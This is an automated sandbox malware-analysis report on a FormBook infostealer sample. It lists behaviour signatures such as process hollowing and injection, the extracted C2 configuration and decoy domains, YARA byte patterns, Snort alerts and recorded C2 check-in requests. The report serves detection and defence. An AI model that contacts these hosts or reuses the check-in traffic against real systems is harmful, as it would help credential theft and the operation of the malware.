Windows Analysis Report
2FcJgghyXg.exe

Overview

General Information

Sample Name: 2FcJgghyXg.exe
Original Sample Name: 4f91d6f43a69717ff16f3c09dcd0e7e8.exe
Analysis ID: 1304954
MD5: 4f91d6f43a69717ff16f3c09dcd0e7e8
SHA1: 51406ad0646c199764a7b2a26e2d31fed91ad77f
SHA256: 035c64adedb7e567711f5a793c587b5886bea69e725a5f038f2b7f01a1eebd5d
Tags: 32, exe, trojan
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Found decision node followed by non-executed suspicious APIs
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • 2FcJgghyXg.exe (PID: 7656 cmdline: C:\Users\user\Desktop\2FcJgghyXg.exe MD5: 4F91D6F43A69717FF16F3C09DCD0E7E8)
    • 2FcJgghyXg.exe (PID: 7700 cmdline: C:\Users\user\Desktop\2FcJgghyXg.exe MD5: 4F91D6F43A69717FF16F3C09DCD0E7E8)
      • explorer.exe (PID: 4884 cmdline: C:\Windows\Explorer.EXE MD5: DDB206DDECAF3B327A418B262EE33468)
        • msdt.exe (PID: 7736 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 35F3075ABFA89839B62E52CD29F62954)
          • cmd.exe (PID: 7756 cmdline: /c del "C:\Users\user\Desktop\2FcJgghyXg.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 86191D9E0E30631DB3E78E4645804358)
  • cleanup
{"C2 list": ["www.l1z3x.cfd/us94/"], "decoy": ["bigelowteaclassaction.com", "barbieexpert.com", "techxworth.com", "soccercitycupsc.com", "konstantynovm.com", "password-manager-66532.bond", "81098a.com", "pkr-performance.com", "craftwoodcapital.com", "j5tm84qrs.top", "bathroomdesign.info", "vrun.live", "clotchek.info", "73460.xyz", "activecollagenmax.com", "truijkl.xyz", "2jci2xj.shop", "sorveteria.net", "02-00.com", "hearing-aids-21865.bond", "ssongg2012.cfd", "ssongg774.cfd", "ty45mmo.click", "shztsysp.com", "stbtsd.com", "sportnsmile.com", "libertaddesertu.com", "linebahis343.com", "ontheroadfromdamascus.com", "pittsleyinsurance.com", "bkdug.win", "hanabi104.online", "emperorvigortonic.info", "36dgwqkv.asia", "terminalcomputer.info", "aaaws.site", "bzfsdgsddu.asia", "simarnit.com", "lexitechlife.com", "n286.top", "uniquecandles.space", "iymew-mall.com", "b-cr5.ink", "nixiegroup.com", "joya-schoenen.com", "bordoderi.online", "abithashop.com", "omnicommedagroup.com", "hot-tubs-59198.bond", "tw8rvck.com", "vrinsured.com", "8526grand.com", "69v39.top", "jaxonthecheap.com", "texascarwrecks.info", "oqc.link", "sb12a.top", "66xecqk.top", "peacedecorfashion.com", "nazadypro.shop", "ana-mika.com", "funeralpin.com", "emdefencetech.com", "hgsna.link"]}
Source | Rule | Description | Author | Strings
00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18839:$sqlite3step: 68 34 1C 7B E1
  • 0x1894c:$sqlite3step: 68 34 1C 7B E1
  • 0x18868:$sqlite3text: 68 38 2A 90 C5
  • 0x1898d:$sqlite3text: 68 38 2A 90 C5
  • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
Source | Rule | Description | Author | Strings
2.2.2FcJgghyXg.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.2FcJgghyXg.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.2FcJgghyXg.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.2.2FcJgghyXg.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.2FcJgghyXg.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18839:$sqlite3step: 68 34 1C 7B E1
  • 0x1894c:$sqlite3step: 68 34 1C 7B E1
  • 0x18868:$sqlite3text: 68 38 2A 90 C5
  • 0x1898d:$sqlite3text: 68 38 2A 90 C5
  • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
          No Sigma rule has matched
Timestamp: 09/07/23-08:40:07.074597
Source IP: 192.168.2.8
Destination IP: 34.120.175.65
SID: 2031412
Source Port: 49774
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 09/07/23-08:39:43.584229
Source IP: 192.168.2.8
Destination IP: 66.235.200.145
SID: 2031412
Source Port: 49773
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 09/07/23-08:39:22.654043
Source IP: 192.168.2.8
Destination IP: 104.21.48.68
SID: 2031412
Source Port: 49772
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 09/07/23-08:39:01.528390
Source IP: 192.168.2.8
Destination IP: 91.195.240.123
SID: 2031412
Source Port: 49771
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 09/07/23-08:40:05.355051
Source IP: 192.168.2.8
Destination IP: 8.8.8.8
SID: 2023883
Source Port: 59429
Destination Port: 53
Protocol: UDP
Classtype: Potentially Bad Traffic

          AV Detection

Source: 00000001.00000002.1253892439.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: FormBook (same C2 list and decoy domains as the configuration listed above)
Source: 2FcJgghyXg.exe | ReversingLabs: Detection: 39%
Source: Yara match | File source: 2.2.2FcJgghyXg.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.2FcJgghyXg.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1253892439.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2498941843.0000000003020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2498297879.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1253892439.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: http://www.hot-tubs-59198.bond/us94/www.simarnit.com | Avira URL Cloud: Label: malware
Source: http://www.69v39.top/us94/?FV9l7b=gRE/KZOmUIl0E9O5tIrQ1aSnWhjtkyGjsCPW33OGocf8yDxoSBdOJbLmmBtR+4NwNN+r&BbW=QzuhmF0pKL | Avira URL Cloud: Label: phishing
Source: http://www.truijkl.xyz/us94/www.j5tm84qrs.top | Avira URL Cloud: Label: phishing
Source: http://www.69v39.top/us94/ | Avira URL Cloud: Label: phishing
Source: http://www.nazadypro.shop/us94/ | Avira URL Cloud: Label: malware
Source: http://www.nazadypro.shop/us94/www.soccercitycupsc.com | Avira URL Cloud: Label: malware
Source: http://www.b-cr5.ink/us94/ | Avira URL Cloud: Label: malware
Source: http://www.j5tm84qrs.top/us94/www.66xecqk.top | Avira URL Cloud: Label: phishing
Source: http://www.69v39.top/us94/www.l1z3x.cfd | Avira URL Cloud: Label: phishing
Source: http://www.66xecqk.top/us94/www.terminalcomputer.info | Avira URL Cloud: Label: phishing
Source: http://www.j5tm84qrs.top/us94/ | Avira URL Cloud: Label: phishing
Source: http://www.abithashop.com/us94/ | Avira URL Cloud: Label: malware
Source: http://www.ontheroadfromdamascus.com/us94/ | Avira URL Cloud: Label: malware
Source: http://www.hot-tubs-59198.bond/us94/ | Avira URL Cloud: Label: malware
Source: http://www.simarnit.com/us94/www.hanabi104.online | Avira URL Cloud: Label: malware
Source: http://www.simarnit.com/us94/ | Avira URL Cloud: Label: malware
Source: http://www.emdefencetech.com/us94/ | Avira URL Cloud: Label: malware
Source: http://www.emdefencetech.com/us94/www.nazadypro.shop | Avira URL Cloud: Label: malware
Source: http://www.terminalcomputer.info/us94/www.b-cr5.ink | Avira URL Cloud: Label: malware
Source: http://www.abithashop.com/us94/www.truijkl.xyz | Avira URL Cloud: Label: malware
Source: http://www.emdefencetech.com/us94/?FV9l7b=09CVAw2tWRgghkhUEy5C5oLzHr5PLkNGN/bgaCa/HPdap5UhvkEM57dmWPBbgbvu1iSh&BbW=QzuhmF0pKL | Avira URL Cloud: Label: malware
Source: http://www.truijkl.xyz/us94/ | Avira URL Cloud: Label: phishing
Source: http://www.ontheroadfromdamascus.com/us94/www.hot-tubs-59198.bond | Avira URL Cloud: Label: malware
Source: http://www.terminalcomputer.info/us94/ | Avira URL Cloud: Label: malware
Source: http://www.hanabi104.online/us94/ | Avira URL Cloud: Label: malware
Source: http://www.66xecqk.top/us94/ | Avira URL Cloud: Label: phishing
Source: 2FcJgghyXg.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 2FcJgghyXg.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: msdt.pdbGCTL | source: 2FcJgghyXg.exe, 00000002.00000002.1324284737.0000000003350000.00000040.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.2497776864.00000000007E0000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: xYQq.pdbSHA256K | source: 2FcJgghyXg.exe
Source: Binary string: wntdll.pdbUGP | source: 2FcJgghyXg.exe, 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.2500706865.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.2500706865.0000000004DBD000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000003.1328099105.0000000004ADF000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000004.00000003.1322862387.0000000004924000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: 2FcJgghyXg.exe, 2FcJgghyXg.exe, 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.2500706865.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.2500706865.0000000004DBD000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000003.1328099105.0000000004ADF000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000004.00000003.1322862387.0000000004924000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msdt.pdb | source: 2FcJgghyXg.exe, 00000002.00000002.1324284737.0000000003350000.00000040.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.2497776864.00000000007E0000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: xYQq.pdb | source: 2FcJgghyXg.exe
Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 4x nop then pop edi | 2_2_00416CD9

          Networking

Source: C:\Windows\explorer.exe | Network Connect: 34.120.175.65 80
Source: C:\Windows\explorer.exe | Network Connect: 91.195.240.123 80
Source: C:\Windows\explorer.exe | Network Connect: 104.21.48.68 80
Source: C:\Windows\explorer.exe | Network Connect: 66.235.200.145 80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49771 -> 91.195.240.123:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49772 -> 104.21.48.68:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49773 -> 66.235.200.145:80
Source: Traffic | Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.8:59429 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49774 -> 34.120.175.65:80
Source: Malware configuration extractor | URLs: www.l1z3x.cfd/us94/
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: global traffic | HTTP traffic detected: GET /us94/?FV9l7b=09CVAw2tWRgghkhUEy5C5oLzHr5PLkNGN/bgaCa/HPdap5UhvkEM57dmWPBbgbvu1iSh&BbW=QzuhmF0pKL HTTP/1.1 | Host: www.emdefencetech.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /us94/?FV9l7b=dEK1UcEseC60ArM7bnAGctGEpZul5aHqilxPZgyrfd7+4uauQhfO1u/GuBaUBJFU+KOU&BbW=QzuhmF0pKL HTTP/1.1 | Host: www.nazadypro.shop | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /us94/?FV9l7b=S5srMiwBCDtV4rjo3jAT9rEjkkSDttoSOLAmgXzTQBVP9tcOlEr2qFRjTuqDw5Sxe1FF&BbW=QzuhmF0pKL HTTP/1.1 | Host: www.soccercitycupsc.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /us94/?FV9l7b=gRE/KZOmUIl0E9O5tIrQ1aSnWhjtkyGjsCPW33OGocf8yDxoSBdOJbLmmBtR+4NwNN+r&BbW=QzuhmF0pKL HTTP/1.1 | Host: www.69v39.top | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 66.235.200.145
Source: unknown | Network traffic detected: HTTP traffic on port 49688 -> 443
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
  Date: Thu, 07 Sep 2023 06:39:22 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kTYDAkJwCyw0%2BnhK7NN2bcwb94Iew%2FOYP2vLbo1Mp%2BeteJHtybie0loptL9iJqTk55Y3OiGn4digZd6g4%2BoNGUC4NxW6%2FXzw5tX3zUoews%2B3g0ZC575%2BgflLHEfb2IbFUbaSogI%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 802cf4470aa209f7-LAS
  alt-svc: h3=":443"; ma=86400
  Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
  Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: explorer.exe, 00000003.00000002.2504551014.00000000071E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1263284729.00000000071E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1267280115.00000000093C3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1267280115.000000000942F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2509722390.00000000093C3000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: explorer.exe, 00000003.00000002.2504551014.00000000071E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1263284729.00000000071E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1267280115.00000000093C3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1267280115.000000000942F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2509722390.00000000093C3000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: explorer.exe, 00000003.00000000.1267280115.00000000093F5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2509722390.00000000093F4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
Source: explorer.exe, 00000003.00000000.1267280115.00000000093C3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1267280115.000000000942F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2509722390.00000000093C3000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000003.00000000.1259489346.0000000002BD0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1265595351.0000000007770000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1265570865.0000000007760000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.microsoft.co
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.66xecqk.top
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.66xecqk.top/us94/
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.66xecqk.top/us94/www.terminalcomputer.info
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.66xecqk.topReferer:
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.69v39.top
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.69v39.top/us94/
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.69v39.top/us94/www.l1z3x.cfd
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.69v39.topReferer:
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.abithashop.com
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.abithashop.com/us94/
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.abithashop.com/us94/www.truijkl.xyz
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.abithashop.comReferer:
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.b-cr5.ink
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.b-cr5.ink/us94/
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.b-cr5.ink/us94/www.barbieexpert.com
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.b-cr5.inkReferer:
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.barbieexpert.com
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.barbieexpert.com/us94/
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.barbieexpert.com/us94/www.ontheroadfromdamascus.com
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.barbieexpert.comReferer:
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.emdefencetech.com
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.emdefencetech.com/us94/
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.emdefencetech.com/us94/www.nazadypro.shop
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.emdefencetech.comReferer:
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.hanabi104.online
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.hanabi104.online/us94/
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.hanabi104.onlineReferer:
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.hot-tubs-59198.bond
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.hot-tubs-59198.bond/us94/
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.hot-tubs-59198.bond/us94/www.simarnit.com
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.hot-tubs-59198.bondReferer:
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.j5tm84qrs.top
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.j5tm84qrs.top/us94/
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.j5tm84qrs.top/us94/www.66xecqk.top
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.j5tm84qrs.topReferer:
Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.l1z3x.cfd
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.l1z3x.cfd/us94/
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.l1z3x.cfd/us94/www.abithashop.com
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.l1z3x.cfdReferer:
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nazadypro.shop
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nazadypro.shop/us94/
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nazadypro.shop/us94/www.soccercitycupsc.com
